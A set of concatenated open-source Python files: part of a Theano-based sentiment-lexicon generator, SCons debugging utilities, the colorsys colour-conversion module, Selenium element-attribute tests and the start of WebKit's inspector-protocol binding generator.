if a_seed_re.search(a_form) or a_seed_re.search(a_lemma) \
or a_form in a_seeds or normalize(a_form) in a_seeds \
or a_lemma in a_seeds:
return True
return False
max_sent_len = 0
X = []
Y = []
toks = []
label = None
for iform, itag, ilemma in _read_files_helper(a_crp_files):
if ilemma is None:
if toks:
if label is not None:
max_sent_len = max(max_sent_len, len(toks))
X.append(deepcopy(toks))
Y.append(label)
del toks[:]
label = None
continue
if ilemma in word2vecid:
toks.append(word2vecid[ilemma])
if check_in_seeds(iform, ilemma, a_pos, a_pos_re):
label = POSITIVE_IDX
elif check_in_seeds(iform, ilemma, a_neg, a_neg_re):
label = NEGATIVE_IDX
elif label is None and check_in_seeds(iform, ilemma,
a_neut, NONMATCH_RE):
label = NEUTRAL_IDX
X = np.array(
[x + [UNK_I] * (max_sent_len - len(x))
for x in X], dtype="int32")
Y = np.array(Y, dtype="int32")
return (word2vecid, max_sent_len, X, Y)
def init_embeddings(vocab_size, k=3):
    """Uniformly initialize lexicon scores for each vocabulary word.
Args:
vocab_size (int): vocabulary size
k (int): dimensionality of embeddings
Returns:
        2-tuple(theano.shared, int): embedding matrix, vector dimensionality
"""
rand_vec = np.random.uniform(-0.25, 0.25, k)
W = floatX(np.broadcast_to(rand_vec,
(vocab_size, k)))
# zero-out the vector of unknown terms
W[UNK_I] *= 0.
return theano.shared(value=W, name='W'), k
def init_nnet(W, k):
"""Initialize neural network.
Args:
W (theano.shared): embedding matrix
k: dimensionality of the vector
"""
# `x' will be a matrix of size `m x n', where `m' is the mini-batch size
# and `n' is the maximum observed sentence length times the dimensionality
# of embeddings (`k')
x = TT.imatrix(name='x')
# `y' will be a vectors of size `m', where `m' is the mini-batch size
y = TT.ivector(name='y')
# `emb_sum' will be a matrix of size `m x k', where `m' is the mini-batch
# size and `k' is dimensionality of embeddings
emb_sum = W[x].sum(axis=1)
# it actually does not make sense to have an identity matrix in the
    # network, but that's what the original Vo implementation actually does
# W2S = theano.shared(value=floatX(np.eye(3)), name="W2S")
# y_prob = TT.nnet.softmax(TT.dot(W2S, emb_sum.T))
y_prob = TT.nnet.softmax(emb_sum)
y_pred = TT.argmax(y_prob, axis=1)
params = [W]
cost = -TT.mean(TT.log(y_prob)[TT.arange(y.shape[0]), y])
updates = sgd_updates_adadelta(params, cost)
train = theano.function([x, y], cost, updates=updates)
acc = TT.sum(TT.eq(y, y_pred))
validate = theano.function([x, y], acc)
zero_vec = TT.basic.zeros(k)
zero_out = theano.function([],
updates=[(W,
TT.set_subtensor(W[UNK_I, :],
zero_vec))])
return (train, validate, zero_out, params)
def vo(a_N, a_crp_files, a_pos, a_neg, a_neut,
a_pos_re=NONMATCH_RE, a_neg_re=NONMATCH_RE, a_encoding=ENCODING):
"""Method for generating sentiment lexicons using Velikovich's approach.
@param a_N - number of terms to extract
@param a_crp_files - files of the original corpus
@param a_pos - initial set of positive terms to be expanded
@param a_neg - initial set of negative terms to be expanded
@param a_neut - initial set of neutral terms to be expanded
@param a_pos_re - regular expression for matching positive terms
@param a_neg_re - regular expression for matching negative terms
@param a_encoding - encoding of the vector file
@return list of terms sorted according to their polarities
"""
# digitize training set
word2vecid, max_sent_len, X, Y = _read_files(
a_crp_files, a_pos, a_neg, a_neut, a_pos_re, a_neg_re,
a_encoding
)
    # initialize neural net and embedding matrix
W, k = init_embeddings(len(word2vecid))
train, validate, zero_out, params = init_nnet(W, k)
# organize minibatches and run the training
N = len(Y)
assert N, "Training set is empty."
train_idcs, devtest_idcs = train_test_split(
np.arange(N), test_size=0.1)
train_N = len(train_idcs)
devtest_N = float(len(devtest_idcs))
devtest_x = X[devtest_idcs[:]]
devtest_y = Y[devtest_idcs[:]]
btch_size = min(N, BTCH_SIZE)
epoch_i = 0
acc = 0
best_acc = -1
prev_acc = FMIN
best_params = []
while epoch_i < MAX_EPOCHS:
np.random.shuffle(train_idcs)
cost = acc = 0.
start_time = datetime.utcnow()
for start in np.arange(0, train_N, btch_size):
end = min(train_N, start + btch_size)
btch_x = X[train_idcs[start:end]]
btch_y = Y[train_idcs[start:end]]
cost += train(btch_x, btch_y)
zero_out()
acc = validate(devtest_x, devtest_y) / devtest_N
if acc >= best_acc:
best_params = [p.get_value() for p in params]
best_acc = acc
sfx = " *"
else:
sfx = ''
end_time = datetime.utcnow()
tdelta = (end_time - start_time).total_seconds()
print("Iteration #{:d} ({:.2f} sec): cost = {:.2f}, "
"accuracy = {:.2%};{:s}".format(epoch_i, tdelta, cost,
acc, sfx),
file=sys.stderr)
if abs(prev_acc - acc) < EPSILON and epoch_i > MIN_EPOCHS:
break
else:
prev_acc = acc
epoch_i += 1
if best_params:
for p, val in zip(params, best_params):
p.set_value(val)
W = W.get_value()
ret = []
for w, w_id in word2vecid.iteritems():
if w_id == UNK_I:
continue
elif w in a_pos or a_pos_re.search(w):
w_score = FMAX
elif w in a_neg or a_neg_re.search(w):
w_score = FMIN
else:
w_pol = np.argmax(W[w_id])
if w_pol == NEUTRAL_IDX:
continue
w_score = np.max(W[w_id])
if (w_pol == POSITIVE_IDX and w_score < 0.) \
or (w_pol == NEGATIVE_IDX and w_score > 0.):
w_score *= -1
ret.append((w,
POSITIVE_LBL if w_score > 0. else NEGATIVE_LBL,
w_score))
ret.sort(key=lambda el: abs(el[-1]), reverse=True)
if a_N >= 0:
del ret[a_N:]
return ret
|
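The network built by `init_nnet` in `vo.py` above classifies a sentence by summing the embedding rows of its token ids (`W[x].sum(axis=1)`) and taking a softmax over the three polarity classes; a dependency-free sketch of that forward pass (the toy matrix and class indices here are hypothetical, not the learned `W`):

```python
import math

def predict(W, sent):
    # sum the embedding rows for the token ids in `sent`,
    # then take the argmax of the softmax over the polarity classes
    k = len(W[0])
    scores = [sum(W[t][j] for t in sent) for j in range(k)]
    m = max(scores)
    exps = [math.exp(s - m) for s in scores]
    return exps.index(max(exps))

# hypothetical 3-dimensional "embeddings"; row 0 is the zeroed UNK row
W = [[0.0, 0.0, 0.0],
     [2.0, 0.1, 0.0],   # token whose mass sits in class 0
     [0.0, 0.2, 3.0]]   # token whose mass sits in class 2
assert predict(W, [1, 0]) == 0
assert predict(W, [1, 2]) == 2
```

Since softmax is monotone, the predicted class is just the argmax of the summed scores; the softmax only matters for the training cost.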
angad/libjingle-mac | refs/heads/master | scons-2.2.0/engine/SCons/Debug.py | 14 | """SCons.Debug
Code for debugging SCons internal things. Shouldn't be
needed by most users.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Debug.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
import os
import sys
import time
import weakref
tracked_classes = {}
def logInstanceCreation(instance, name=None):
if name is None:
name = instance.__class__.__name__
if name not in tracked_classes:
tracked_classes[name] = []
tracked_classes[name].append(weakref.ref(instance))
def string_to_classes(s):
if s == '*':
return sorted(tracked_classes.keys())
else:
return s.split()
def fetchLoggedInstances(classes="*"):
classnames = string_to_classes(classes)
return [(cn, len(tracked_classes[cn])) for cn in classnames]
def countLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write("%s: %d\n" % (classname, len(tracked_classes[classname])))
def listLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write('\n%s:\n' % classname)
for ref in tracked_classes[classname]:
obj = ref()
if obj is not None:
file.write(' %s\n' % repr(obj))
def dumpLoggedInstances(classes, file=sys.stdout):
for classname in string_to_classes(classes):
file.write('\n%s:\n' % classname)
for ref in tracked_classes[classname]:
obj = ref()
if obj is not None:
file.write(' %s:\n' % obj)
for key, value in obj.__dict__.items():
file.write(' %20s : %s\n' % (key, value))
if sys.platform[:5] == "linux":
# Linux doesn't actually support memory usage stats from getrusage().
def memory():
mstr = open('/proc/self/stat').read()
mstr = mstr.split()[22]
return int(mstr)
elif sys.platform[:6] == 'darwin':
#TODO really get memory stats for OS X
def memory():
return 0
else:
try:
import resource
except ImportError:
try:
import win32process
import win32api
except ImportError:
def memory():
return 0
else:
def memory():
process_handle = win32api.GetCurrentProcess()
memory_info = win32process.GetProcessMemoryInfo( process_handle )
return memory_info['PeakWorkingSetSize']
else:
def memory():
res = resource.getrusage(resource.RUSAGE_SELF)
return res[4]
# returns caller's stack
def caller_stack(*backlist):
import traceback
if not backlist:
backlist = [0]
result = []
for back in backlist:
tb = traceback.extract_stack(limit=3+back)
key = tb[0][:3]
result.append('%s:%d(%s)' % func_shorten(key))
return result
caller_bases = {}
caller_dicts = {}
# trace a caller's stack
def caller_trace(back=0):
import traceback
tb = traceback.extract_stack(limit=3+back)
tb.reverse()
callee = tb[1][:3]
caller_bases[callee] = caller_bases.get(callee, 0) + 1
for caller in tb[2:]:
caller = callee + caller[:3]
try:
entry = caller_dicts[callee]
except KeyError:
caller_dicts[callee] = entry = {}
entry[caller] = entry.get(caller, 0) + 1
callee = caller
# print a single caller and its callers, if any
def _dump_one_caller(key, file, level=0):
leader = ' '*level
for v,c in sorted([(-v,c) for c,v in caller_dicts[key].items()]):
file.write("%s %6d %s:%d(%s)\n" % ((leader,-v) + func_shorten(c[-3:])))
if c in caller_dicts:
_dump_one_caller(c, file, level+1)
# print each call tree
def dump_caller_counts(file=sys.stdout):
for k in sorted(caller_bases.keys()):
file.write("Callers of %s:%d(%s), %d calls:\n"
% (func_shorten(k) + (caller_bases[k],)))
_dump_one_caller(k, file)
shorten_list = [
( '/scons/SCons/', 1),
( '/src/engine/SCons/', 1),
( '/usr/lib/python', 0),
]
if os.sep != '/':
shorten_list = [(t[0].replace('/', os.sep), t[1]) for t in shorten_list]
def func_shorten(func_tuple):
f = func_tuple[0]
for t in shorten_list:
i = f.find(t[0])
if i >= 0:
if t[1]:
i = i + len(t[0])
return (f[i:],)+func_tuple[1:]
return func_tuple
TraceFP = {}
if sys.platform == 'win32':
TraceDefault = 'con'
else:
TraceDefault = '/dev/tty'
TimeStampDefault = None
StartTime = time.time()
PreviousTime = StartTime
def Trace(msg, file=None, mode='w', tstamp=None):
"""Write a trace message to a file. Whenever a file is specified,
it becomes the default for the next call to Trace()."""
global TraceDefault
global TimeStampDefault
global PreviousTime
if file is None:
file = TraceDefault
else:
TraceDefault = file
if tstamp is None:
tstamp = TimeStampDefault
else:
TimeStampDefault = tstamp
try:
fp = TraceFP[file]
except KeyError:
try:
fp = TraceFP[file] = open(file, mode)
except TypeError:
# Assume we were passed an open file pointer.
fp = file
if tstamp:
now = time.time()
fp.write('%8.4f %8.4f: ' % (now - StartTime, now - PreviousTime))
PreviousTime = now
fp.write(msg)
fp.flush()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
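The `logInstanceCreation` / `fetchLoggedInstances` machinery in `SCons/Debug.py` above tracks live instances per class name via weak references; a small standalone sketch of the same idea (it assumes CPython's immediate refcount-based collection when checking liveness):

```python
import weakref

tracked = {}

def log_instance(obj):
    # same idea as SCons.Debug.logInstanceCreation: keep weakrefs per class name
    tracked.setdefault(obj.__class__.__name__, []).append(weakref.ref(obj))

class Node(object):
    pass

a, b = Node(), Node()
log_instance(a)
log_instance(b)
assert len(tracked['Node']) == 2

# weak references do not keep instances alive
del a
live = [r for r in tracked['Node'] if r() is not None]
assert len(live) == 1
```

Using `weakref.ref` rather than strong references is the key design choice: the debug registry never changes object lifetimes, so counting live instances reflects real leaks.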
sunlianqiang/kbengine | refs/heads/master | kbe/src/lib/python/Lib/colorsys.py | 144 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which cover a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
#
# There are a great many versions of the constants used in these formulae.
# The ones in this library uses constants from the FCC version of NTSC.
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.74*(r-y) - 0.27*(b-y)
q = 0.48*(r-y) + 0.41*(b-y)
return (y, i, q)
def yiq_to_rgb(y, i, q):
# r = y + (0.27*q + 0.41*i) / (0.74*0.41 + 0.27*0.48)
# b = y + (0.74*q - 0.48*i) / (0.74*0.41 + 0.27*0.48)
# g = y - (0.30*(r-y) + 0.11*(b-y)) / 0.59
r = y + 0.9468822170900693*i + 0.6235565819861433*q
g = y - 0.27478764629897834*i - 0.6356910791873801*q
b = y - 1.1085450346420322*i + 1.7090069284064666*q
if r < 0.0:
r = 0.0
if g < 0.0:
g = 0.0
if b < 0.0:
b = 0.0
if r > 1.0:
r = 1.0
if g > 1.0:
g = 1.0
if b > 1.0:
b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
s = (maxc-minc) / (maxc+minc)
else:
s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0:
return l, l, l
if l <= 0.5:
m2 = l * (1.0+s)
else:
m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH:
return m1 + (m2-m1)*hue*6.0
if hue < 0.5:
return m2
if hue < TWO_THIRD:
return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc:
return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
i = i%6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
# Cannot get here
|
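The HSV conversions in `colorsys.py` above round-trip exactly for in-range inputs; a quick check using the stdlib `colorsys` module that this file implements:

```python
import colorsys  # stdlib module containing the functions defined above

r, g, b = 0.2, 0.4, 0.4
h, s, v = colorsys.rgb_to_hsv(r, g, b)
assert abs(v - 0.4) < 1e-9  # V is the maximum channel
r2, g2, b2 = colorsys.hsv_to_rgb(h, s, v)
# converting back recovers the original triple
assert max(abs(r - r2), abs(g - g2), abs(b - b2)) < 1e-9
```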
skurochkin/selenium | refs/heads/master | py/test/selenium/webdriver/common/element_attribute_tests.py | 65 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import pytest
class ElementAttributeTests(unittest.TestCase):
def testShouldReturnNullWhenGettingTheValueOfAnAttributeThatIsNotListed(self):
self._loadSimplePage()
head = self.driver.find_element_by_xpath("/html")
attribute = head.get_attribute("cheese")
self.assertTrue(attribute is None)
def testShouldReturnNullWhenGettingSrcAttributeOfInvalidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("invalidImgTag")
img_attr = img.get_attribute("src")
self.assertTrue(img_attr is None)
def testShouldReturnAnAbsoluteUrlWhenGettingSrcAttributeOfAValidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validImgTag")
img_attr = img.get_attribute("src")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnAnAbsoluteUrlWhenGettingHrefAttributeOfAValidAnchorTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validAnchorTag")
img_attr = img.get_attribute("href")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnEmptyAttributeValuesWhenPresentAndTheValueIsActuallyEmpty(self):
self._loadSimplePage()
body = self.driver.find_element_by_xpath("//body")
self.assertEqual("", body.get_attribute("style"))
def testShouldReturnTheValueOfTheDisabledAttributeAsFalseIfNotSet(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertEqual(None, inputElement.get_attribute("disabled"))
self.assertTrue(inputElement.is_enabled())
pElement = self.driver.find_element_by_id("peas")
self.assertEqual(None, pElement.get_attribute("disabled"))
self.assertTrue(pElement.is_enabled())
    def testShouldReturnTheValueOfTheIndexAttributeEvenIfItIsMissing(self):
self._loadPage("formPage")
multiSelect = self.driver.find_element_by_id("multi")
options = multiSelect.find_elements_by_tag_name("option")
self.assertEqual("1", options[1].get_attribute("index"))
def testShouldIndicateTheElementsThatAreDisabledAreNotEnabled(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='notWorking']")
self.assertFalse(inputElement.is_enabled())
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertTrue(inputElement.is_enabled())
def testElementsShouldBeDisabledIfTheyAreDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
self.assertFalse(disabledTextElement1.is_enabled())
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
self.assertFalse(disabledTextElement2.is_enabled())
disabledSubmitElement = self.driver.find_element_by_id("disabledSubmitElement")
self.assertFalse(disabledSubmitElement.is_enabled())
def testShouldIndicateWhenATextAreaIsDisabled(self):
self._loadPage("formPage")
textArea = self.driver.find_element_by_xpath("//textarea[@id='notWorkingArea']")
self.assertFalse(textArea.is_enabled())
def testShouldThrowExceptionIfSendingKeysToElementDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
with self.assertRaises(Exception):
disabledTextElement1.send_keys("foo")
self.assertEqual("", disabledTextElement1.text)
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
with self.assertRaises(Exception):
disabledTextElement2.send_keys("bar")
self.assertEqual("", disabledTextElement2.text)
def testShouldIndicateWhenASelectIsDisabled(self):
self._loadPage("formPage")
enabled = self.driver.find_element_by_name("selectomatic")
disabled = self.driver.find_element_by_name("no-select")
self.assertTrue(enabled.is_enabled())
self.assertFalse(disabled.is_enabled())
def testShouldReturnTheValueOfCheckedForACheckboxEvenIfItLacksThatAttribute(self):
self._loadPage("formPage")
checkbox = self.driver.find_element_by_xpath("//input[@id='checky']")
self.assertTrue(checkbox.get_attribute("checked") is None)
checkbox.click()
self.assertEqual("true", checkbox.get_attribute("checked"))
def testShouldReturnTheValueOfSelectedForRadioButtonsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
neverSelected = self.driver.find_element_by_id("cheese")
initiallyNotSelected = self.driver.find_element_by_id("peas")
initiallySelected = self.driver.find_element_by_id("cheese_and_peas")
self.assertTrue(neverSelected.get_attribute("selected") is None)
self.assertTrue(initiallyNotSelected.get_attribute("selected") is None)
self.assertEqual("true", initiallySelected.get_attribute("selected"))
initiallyNotSelected.click()
self.assertTrue(neverSelected.get_attribute("selected") is None)
self.assertEqual("true", initiallyNotSelected.get_attribute("selected"))
self.assertTrue(initiallySelected.get_attribute("selected") is None)
def testShouldReturnTheValueOfSelectedForOptionsInSelectsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
selectBox = self.driver.find_element_by_xpath("//select[@name='selectomatic']")
options = selectBox.find_elements_by_tag_name("option")
one = options[0]
two = options[1]
self.assertTrue(one.is_selected())
self.assertFalse(two.is_selected())
self.assertEqual("true", one.get_attribute("selected"))
self.assertTrue(two.get_attribute("selected") is None)
def testShouldReturnValueOfClassAttributeOfAnElement(self):
self._loadPage("xhtmlTest")
heading = self.driver.find_element_by_xpath("//h1")
classname = heading.get_attribute("class")
self.assertEqual("header", classname)
# Disabled due to issues with Frames
#def testShouldReturnValueOfClassAttributeOfAnElementAfterSwitchingIFrame(self):
# self._loadPage("iframes")
# self.driver.switch_to.frame("iframe1")
#
# wallace = self.driver.find_element_by_xpath("//div[@id='wallace']")
# classname = wallace.get_attribute("class")
# self.assertEqual("gromit", classname)
def testShouldReturnTheContentsOfATextAreaAsItsValue(self):
self._loadPage("formPage")
value = self.driver.find_element_by_id("withText").get_attribute("value")
self.assertEqual("Example text", value)
def testShouldReturnTheContentsOfATextAreaAsItsValueWhenSetToNonNominalTrue(self):
self._loadPage("formPage")
e = self.driver.find_element_by_id("withText")
self.driver.execute_script("arguments[0].value = 'tRuE'", e)
value = e.get_attribute("value")
self.assertEqual("tRuE", value)
def testShouldTreatReadonlyAsAValue(self):
self._loadPage("formPage")
element = self.driver.find_element_by_name("readonly")
readOnlyAttribute = element.get_attribute("readonly")
textInput = self.driver.find_element_by_name("x")
notReadOnly = textInput.get_attribute("readonly")
self.assertNotEqual(readOnlyAttribute, notReadOnly)
def testShouldGetNumericAttribute(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("withText")
self.assertEqual("5", element.get_attribute("rows"))
def testCanReturnATextApproximationOfTheStyleAttribute(self):
self._loadPage("javascriptPage")
style = self.driver.find_element_by_id("red-item").get_attribute("style")
self.assertTrue("background-color" in style.lower())
def testShouldCorrectlyReportValueOfColspan(self):
self._loadPage("tables")
th1 = self.driver.find_element_by_id("th1")
td2 = self.driver.find_element_by_id("td2")
self.assertEqual("th1", th1.get_attribute("id"))
self.assertEqual("3", th1.get_attribute("colspan"))
self.assertEqual("td2", td2.get_attribute("id"));
self.assertEquals("2", td2.get_attribute("colspan"));
def testCanRetrieveTheCurrentValueOfATextFormField_textInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("working")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_emailInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("email")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello@example.com")
self.assertEqual("hello@example.com", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_textArea(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("emptyTextArea")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
@pytest.mark.ignore_chrome
def testShouldReturnNullForNonPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("working")
self.assertEqual(None, element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("wallace")
self.assertEqual(None, element2.get_attribute("nowrap"))
@pytest.mark.ignore_ie
def testShouldReturnTrueForPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("emailRequired")
self.assertEqual("true", element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("emptyTextAreaRequired")
self.assertEqual("true", element2.get_attribute("required"))
element3 = self.driver.find_element_by_id("inputRequired")
self.assertEqual("true", element3.get_attribute("required"))
element4 = self.driver.find_element_by_id("textAreaRequired")
self.assertEqual("true", element4.get_attribute("required"))
element5 = self.driver.find_element_by_id("unwrappable")
self.assertEqual("true", element5.get_attribute("nowrap"))
def testShouldGetUnicodeCharsFromAttribute(self):
self._loadPage("formPage")
title = self.driver.find_element_by_id("vsearchGadget").get_attribute("title")
self.assertEqual('Hvad s\xf8ger du?', title)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
|
qtproject/qtwebkit | refs/heads/dev | Source/JavaScriptCore/inspector/scripts/generate-inspector-protocol-bindings.py | 2 | #!/usr/bin/env python
#
# Copyright (c) 2014 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# This script generates JS, Objective C, and C++ bindings for the inspector protocol.
# Generators for individual files are located in the codegen/ directory.
import os.path
import re
import sys
import string
from string import Template
import optparse
import logging
try:
import json
except ImportError:
import simplejson as json
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.ERROR)
log = logging.getLogger('global')
try:
from codegen import *
# When copying generator files to JavaScriptCore's private headers on Mac,
# the codegen/ module directory is flattened. So, import directly.
except ImportError, e:
# log.error(e) # Uncomment this to debug early import errors.
import models
from models import *
from generator import *
from cpp_generator import *
from objc_generator import *
from generate_cpp_alternate_backend_dispatcher_header import *
from generate_cpp_backend_dispatcher_header import *
from generate_cpp_backend_dispatcher_implementation import *
from generate_cpp_frontend_dispatcher_header import *
from generate_cpp_frontend_dispatcher_implementation import *
from generate_cpp_protocol_types_header import *
from generate_cpp_protocol_types_implementation import *
from generate_js_backend_commands import *
from generate_objc_backend_dispatcher_header import *
from generate_objc_backend_dispatcher_implementation import *
from generate_objc_configuration_header import *
from generate_objc_configuration_implementation import *
from generate_objc_conversion_helpers import *
from generate_objc_frontend_dispatcher_implementation import *
from generate_objc_header import *
from generate_objc_internal_header import *
from generate_objc_protocol_types_implementation import *
# A writer that only updates file if it actually changed.
class IncrementalFileWriter:
def __init__(self, filepath, force_output):
self._filepath = filepath
self._output = ""
self.force_output = force_output
def write(self, text):
self._output += text
def close(self):
text_changed = True
self._output = self._output.rstrip() + "\n"
try:
if self.force_output:
raise IOError("forced output; skip comparing against the old file")
read_file = open(self._filepath, "r")
old_text = read_file.read()
read_file.close()
text_changed = old_text != self._output
except:
# Ignore, just overwrite by default
pass
if text_changed or self.force_output:
out_file = open(self._filepath, "w")
out_file.write(self._output)
out_file.close()
